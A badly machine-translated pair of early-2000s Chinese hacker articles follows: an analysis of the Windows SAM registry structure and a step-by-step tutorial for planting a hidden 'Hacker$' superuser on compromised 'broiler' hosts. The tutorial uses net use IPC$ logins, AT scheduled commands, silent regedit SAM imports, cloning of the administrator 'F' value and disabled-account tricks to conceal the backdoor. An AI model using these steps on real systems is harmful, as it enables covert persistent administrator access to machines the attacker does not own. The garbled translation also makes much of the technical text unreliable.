Anatomy Security Account Manager (SAM) structure

Anatomy Security Account Manager (SAM) Source: www.opengram.com Category: Hacker Date: 2002-5-1 6:28:30 Today / Total Views: 1/386

Author: refDomemail: Refdom@263.nethomepage: www.opengram.com2002 / 4/29

I, summary II, SAMIII, SAM Database Structure IV, SAM Database Structure and Main Content V, Conclusion About SAM Database Analysis

I. Abstract Analysis The Safety Account Manager structure is a matter of more than a month, only zero fragment records the fragment and has not been released. The main reason is that the Security Account Manager (SAM) is the core of Win system account management, and very systematically, and many places are just inference and guessing. At the same time, Sam Hack may cause LSAss.exe loading when starting. Account Manager error, even if it is safe mode, it cannot be repaired (the SAM is bound to be loaded) so that the entire system starts crash (I usually need to rely on the second system to delete the SAM file to start). As for now, it is mainly because of the production of rootkit methods described by ADAM and a "cloning administrator account" species, familiar with SAM's structure, can help security maintenance personnel safety test (of course It is also possible to make a bad attemparent use). Here is only the contents of SAM, which is not open to SECURITY. Second, about SAM Don't misunderstand SAM, this is not a file SAM as simple. SAM (Security Account Manager) is responsible for the control and maintenance of the SAM database. The SAM database is located under the registry HKLM / SAM / SAM, which is protected by ACL, you can open the Registry Editor using Regedt32.exe and set the appropriate permissions to view the contents of the SAM. Sam databases are saved on the SAM file in the% systemroot% system32 / config / directory on the disk, and a security file is also included in this directory, which is a secure database. There are many relationships. The SAM database contains all groups, account information, including the password hash, the SID of the account. These contents are described in detail later. Take the Chinese Win2k Adv Server in our analysis. Third, the SAM database in the registry Expand Registry HKLM / SAM / SAM /: HKLM --- SAM | --- SAM | --- Domains | | --- Account | | | | --- MEMBERS | | | --- Groups | | | | --- 00000201 | | | | --- Names | | | Users | | --- 000001F4 | | | --- 000003E8 | | | --- 000003E9 | | | --- Names | | | | --- Guest | | | --- iUSR_REFDOM | | | --- Builtin | | --- 0000022 | | | --- 00000222 | | --- 00000223 | | | --- MEMBERS | | | | --- S-1-5-21-1214440339-70669826-1708537768 | | | | --- 000001f5 | | | --- 000003E8 | | | | --- 000003E9 | | | --- Names | | | --- Uses | | | --- Power Users | | --- Groups | | | --- Names | || | --- Users | | --- Names || --- Rxact This is the SAM tree in the registry on the machine. Controlled in the SAM file, it can be seen that the SAM tree in the registry is actually the same as the SAM file. However, the SAM file is a primary RXACT and then in the Domains content (push in this class), the order in which the file in the file is reversed.

If you are accustomed to see the contents of the file, from the file 0000H to 0006CH, it is indicated by the SAM database where: / systemroot / system32 / config / sam, then a blank, until 01000H (hbin), starting from here is the entire database content. The file content of the SAM database is not mainly introduced, but it will be introduced, interested in research. Fourth, the structure and main content of the SAM database: In the entire database, the main content of the account is below these locations: in / domains / under the domain (or machine) SAM content, there are two branches "Account" And "Builtin". / Domains / Account is the content of the user account. / Domains / Account / Users are information about each account. The subkey under which is the SID relative flag of each account. For example, 000001F4, there are two children, f and v under each account. Where / names / under the user account name, each account name has only one default child, the type is not a general registry data type, but the last item of the SID of the flag (relative identifier), such as The administrator under which the type is 0x1f4, so it corresponds to the content of the account name Administrator from the previous 000001F4. This shows the logic of the MS account search. Inference 1: From the registry structure to see the account, if you query a account name Refdom information, Microsoft finds its type 0x3eb from the account name Refdom, then find the contents of the relative flag (or SID) 000003EB. All API functions (such as NetuseRenum ()) are executed. Therefore, if you change the type 0x3eb in the Refdom account to 0x1f4, then this account will be directed to the account of the class 000001f4. And this account 000001F4 is the Administrator account, so that the system turns completely into the refDom account into the Administrator account, all the content used by the account REFDOM, including password, permissions, desktop, record, access time and many more. This inference should be settled, but will mean that two usernames correspond to one user information, the system should have an error on the startup! Inference One is to obtain the previous analysis structure, revealing the relationship between the account name and the SID association during the login process. / Domains / Account / Users / 000001F4, this is the account information of Administrator (other similar). Two of them have two children v and f. The project v is saved is the basic information of the account, the username, the user's full name, the group, description, password hash, notes, if the password, the account is enabled, the password setting time, etc. Some login records in the project f, such as the last login time, the number of error logins, etc., there is an important place to be the SID relative flag of this account. I didn't pay attention to this place when I analyze the structure, this is the idea of ​​Adam. This place is that this SID relative flag appears twice in an account in the registry, one is in sub-key 000001F4, and another place is the content of the sub-key F. four bytes from 48 to 51: F4 01 00 00, this is actually a long type variable, that is, 00 00 01 F4. Synchronization issues will occur when a flag appears in two places. Obviously, Microsoft made this problem.

The two variables should be unified to sign a user account, but Microsoft puts the two variables respectively, but there is no synchronous unity. 000001F4 in the subkey is used to correspond to the username Administrator, so that the account information such as the checkupaccountsid () is convenient, such as the checkupaccountsid (), such as the account-related API function, and this association should be used in the account login. The F4 01 00 00 in the project V value is the most directly associated with the account login. Inframe 2: When WIN is logged in, the relative flag will be obtained from the SAM, and the location of this relative flag is F4 01 00 00 in the V value. However, the account information query is used by the SAM neub key content. Inframed the reason (assuming one): When the account is logged in, the login process obtains the relative flag value in the account record information used by the username in the SAM database (equivalent to F4 01 00 00) in the V value, account login After that, all the values ​​are related to the account, this value is no longer used by the API function, while the relative flag is replaced by the field name of a data record (equivalent to the subkey 000001f4). Microsoft commits a synchronous logic problem! Inference, the second is based on ADAM, did not infer it before. : (Inference 2 If it is established, revealing the process of account SID during the login process. This is why the value in V is the reason why the account login record (login time, password error, etc.). At the same time, because f Save a username content, and the API function queries this username, so the clone method of Adam is still easy to appear, and after adding, this username is also restored to the original user name, from the username on the user name It is difficult. The above introduction to the project V, which saves the basic information of the account, the user name, the user's full name (full name), group, description, password hash, note, if you can change your password, account is enabled , Password setting time, etc. Now, the password hash. Hypothesis 2: In the account entry V, the user hash is included, including the password encrypted in LM2 and NT, Crack, can be separated. After all, LM2 Simple. The content under Domains/builtin is related to the account group. Its structure is similar to / account, and there is a corresponding problem, no longer comes. SAM database saved file SAM, no registration Such a concise content in the table, mainly by the offset, length. And the information of a single account is set in one, not like the form of the registry, which is separated in the form of the form (one key of the name. In another key). SAM file, the data meanings can be positioned according to these separators: NK (6e 6b) key or sub-key name VK (76 6b) corresponding value IF (6C 66) sub-key list SK ( 73 6B) Permissions

V. Conclusion about SAM database analysis: SAM Hack is very dangerous. Incorrect modifications will destroy the system's security data manager, causing system launch issues, although the startup recovery can be started by deleting the SAM file. If you can be familiar with SAM's structure, you will find that you can exchange between user names and user names, user groups and user groups, and the account and account group forgery, completely break the Microsoft account pattern. And very concealed, let the account-related API function can not touch the mind. Although a lot of logic issues have been made in Microsoft handling account information, the security account database is not safe, and all operations must be fully owned by administrator privileges. When the hidden back door is raised, many "hackers" will be used, and the administrator should also be familiar with related technologies, do safety testing, my purpose is reached. Simple testing tools for "Clone Administrator Account" can be downloaded in my homepage (www.opengram.com), but more require administrators to learn related knowledge can we better detect invasion. Establish hidden superuser

Source: Unknown Category: Safety Document Date: 2003-2-8 11:22:08 Today / Total Views: 1/1071

A few days ago, I saw a website (noticed, I am sorry ^ _ *), I saw a graphic tutorial to build hidden superuser, giving me a lot of inspiration, the author only explains how to The hidden super user is established under the local graphical interface, and the author said that he could not implement hidden superuser in the command line, so I started to explore, when I started, I used REG.EXE (version 3.0) as a command line. Take the tool to import the registry file, but after each import, the hidden superuser cannot be used, and then open the registry to view, find that this hidden superuser's default data type is not imported. Since this data type is a hexadecimal number (such as the default data type of Administrator to 000001F4, the data type in the following example is 00000409) instead of the string type, DWORD type, binary type The data type, REG.EXE cannot be identified, and thus cannot be imported, and the registry editor regedit.exe can be imported with the registry interface, and then I want to regedit.exe is a two-to-average program, it You can run in the Windows interface or run under DOS, and since the graphical interface regedit.exe can import this data type, then it should also be able to import this data type below, and later tried to prove my thoughts. . Below I put me this hidden super user creation method as follows: 1. How to build a hidden super user graphics interface on the graphical interface to apply to the broiler of the local or 3389 terminal service. The author I mentioned above is very good, but it is more complicated, and the PSU.exe (procedure to run as a system user), if you want to upload PSU.exe on the broiler. I said this method will not have to use the PSU.exe. Because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and RegedT32.exe in XP are actually a program that modifies the "permission" in right-click "Permissions" when the key value is modified. I think everyone is familiar with regedit.exe, but it is not possible to set permissions to the registry, and the greatest advantage of RegedT32.exe is to set permissions to the registry. NT / 2000 / XP account information is under the hkey_local_machine / sam / sam key of the registry, but other users have no right to view the information inside, so I first use regedt32.exe to the SAM button. I am set to "Full Control" permissions. This allows the information in the SAM key to read and write. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Hacker $, here I set up this in the command line Account NET User Hacker $ 1234 / Add 2, enter: regedt32.exe and enter the regedt32.exe in the start / run. 3, click "Permissions" will then pop up the window point Add to add the account when I log in to the security bar. Here I log in as an administrator, so I will add the Administrator to, and set the permissions to "fully control". Here you need to explain: It is best to add the group where your logged in account or account is, do you want to modify the original account or group, otherwise a series of unnecessary issues will be brought. Waiting for hidden super users to build, come here to delete the account you add. 4, click "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe.

Open button: hkey_local_maichine / sam / sam / domains / account / user / names / harnet $ "5, export item Hacker $, 00000409,000001f4 as Hacker.Reg, 409.REG, 1F4.REG, use Notepad to play this Several exported files are edited, copy the value of the key "f" under the item 000001f4 corresponding to the super user, and override the value of the key "f" under the item 00000409 corresponding to the Hacker, and then 00000409.REG and HACKER .reg merged. 6. Execute Net User Hacker $ / DEL in the command line to delete the user Hacker $ / DEL 7, press F5 to refresh within the regedit.exe window, then play the file - Import registry file Import a modified Hacker.reg to the registry. The original look (just remove the added account administrator). 9. Note: After the hidden superuser is built, you can't see the Hacker $ of the account manager, you can also see if the "Net User" command is not available in the account manager. When it comes, after the super user is established, it cannot be changed. If you change the password of Hacker $ with the NET user command, then this hidden superuser will be seen in the Account Manager, and cannot be deleted.

How to remotely create hidden superusers in the command line will use the AT command because the planned task generated by AT is to run as system, so the psu.exe program is not used. In order to be able to use the AT command, the broiler must open the SCHEDULE service. If it is not turned on, the tool NetSvc.exe or sc.exe in the stream of light can be used remotely. Of course, the method can also be able to start the Schedule service. For command line, you can use a variety of connection methods, such as connecting the MSSQL's 1433 port with SQLEXEC, you can also use Telnet to get a cmdshell, and there is permission to run the AT command. 1. First find a broiler, as for how to come to this is not what I said here. Here first, it is assumed to find a super user for the applistrator, the password is 12345678 broiler, and now we start to remotely establish a hidden super user on the command line. (The host in the example is a host in my local area network. I change its IP address to 13.50.97.238, do not sit on the Internet to avoid harassing the normal IP address.) 2, first establish a connection with broilers Command is: Net Use //13.50.97.238/ipc $ "12345678" / user: "Administrator 3, build a user on broiler with the AT command (if the AT service is not started, you can use the little Netsvc.exe or SC. EXE to stand remotely): AT //13.50.97.238 12:51 C: /Winnt/System32/Net.exe user HACKER $ 1234 / Add to build this add-on user name because there is a match, command This user will not display this user with NET USER, but can see this user. 4, export HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / USERS with an AT command: AT //13.50. 97.238 12:55 C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / / E is the parameters of regedit.exe, in _Local_Machine / Sam / Sam / Domains / Account / UserS / This button must be in / end. If necessary, use quotation marks "C: /WINNT/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users /". 5 Download the Hacker.reg on broilers to this unit to open with Notepad to edit commands to: COPY //13.50.97.238/admin (//13.50.97.238/admin) Introduced, it will not be introduced here. 6, then edit the Hacker.reg to copy the broiler C: //13.50.97.238/admin $/system32/Hacker1.REG 7, view broilers : Net Time //13.50.97.238 Then use the AT command to delete the user Hacker $: AT //13.50.97.238 13:40 Net User Hacker $ / DEL 8. Verify that Hacker $ is deleted: Disconnect with broiler with Net Use //13.50.97.238 / DEL. NET use //13.50.97.238/IPC $ "1234" / user: "HACKER $" is connected to the broiler with the broiler, and the description has been deleted.

9, then establish a connection with broiler: NET use //13.50.97.238/IPC $ "12345678" / user: "administrator" gets the broiler time, use the AT command to copy the broiler's Hacker1.REG import broiler registry: AT / /13.50.97.238 13:41 C: /Winnt/RegeDit.exe / s parameter / s parameter / s parameter / s refers to quiet mode. 10. Verify that the Hacker $ is established, the method is the same as above if the Hacker $ is deleted. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12, through 11 can determine the user HACKER $ with superuser privilege, because I originally used the AT command to build it is a normal user, but now there is remote read, write, deleted permissions. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premise here: 1, first use the NET USE // Baby Chicken IP / IPC $ "Password" / user: "Super User Name" to establish a connection with the remote host to use regedit.exe regedt32.exe and account management Connect with the remote host. 2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password). 4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator. First, I first clone the program Ca.exe first with Xiaoyan, and clone the disabled user Hacker into a super user (after cloning, the user's Hacker will be automatically activated): ca.exe // broiler IP Administrator Super User Password Hacher Hacher Password. 3. If you now have a cmdshell, if you use Telnet service or SQLEXEC to connect the shell of MSSQL's default port 1433, you can use the shell, then you only enter the command: Net user Hacker / Active: NO This user Hacker is disabled (at least surface This is the case), of course, you can also replace the user Hacher to other disabled users.